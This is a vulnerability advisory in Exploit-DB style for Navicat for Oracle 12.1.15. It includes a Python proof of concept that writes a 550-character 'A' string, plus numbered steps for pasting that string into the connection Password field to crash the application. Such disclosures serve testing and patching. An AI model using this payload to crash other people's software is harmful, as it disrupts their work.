Vendor: Navicat for Oracle
By: Victor Mondragón
CVSS: 7.5 (HIGH)
CWE: Denial of Service
Product Name: Navicat for Oracle
Affected Version From: 12.1.15
Affected Version To: 12.1.15
Patch Exists: NO
Platforms Tested: Windows 10 Single Language x64, Windows 7 x64 Service Pack 1
2019

Navicat for Oracle 12.1.15 – “Password” Denial of Service (PoC)

This proof of concept causes a denial of service in Navicat for Oracle 12.1.15 through an overlong value in the "Password" field of a new connection. The exploit code is written in Python and only generates the payload: it writes a string of 550 "A" characters to a text file (code.txt in the reproduction steps). The tester copies that file's content to the clipboard, opens Navicat for Oracle, and selects the 'Connection' option, followed by 'Oracle'. The tester then fills in the connection details (host 1.1.1.1, port 1521, service name ORCL, user name "user") and pastes the clipboard content as the password. When the user clicks 'Accept', the application crashes.

Mitigation:

There is no known mitigation for this vulnerability. Avoid using Navicat for Oracle 12.1.15 or update to a patched version if available.

Exploit-DB raw data:

#Exploit Title: Navicat for Oracle 12.1.15 - "Password" Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-02-14
#Vendor Homepage: https://www.navicat.com/es/
#Software Link: https://www.navicat.com/es/download/navicat-for-oracle
#Tested Version: 12.1.15
#Tested on: Windows 10 Single Language x64/ Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: Navicat_for_Oracle_12.1.15.py
#2.- Open code.txt and copy content to clipboard
#3.- Open Navicat for Oracle 12.1.15
#4.- Select "Conexión"
#5.- Select "Oracle"
#6.- In "Nombre de conexión" type "Test"
#7.- In "Tipo de conexión" select "Basic"
#8.- In "Host" type 1.1.1.1
#9.- In "Puerto" type "1521"
#10.- In "Nombre del servicio" type ORCL
#11.- In "Nombre de usuario" type "user"
#12.- In "Contraseña" Paste Clipboard
#13.- Select "Aceptar"
#14.- Crashed

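# Build the 550-character "A" string that is pasted into the "Contraseña" (password) field
cod = "\x41" * 550

# Write it to code.txt, the file named in step 2 of the steps above
with open('code.txt', 'w') as f:
    f.write(cod)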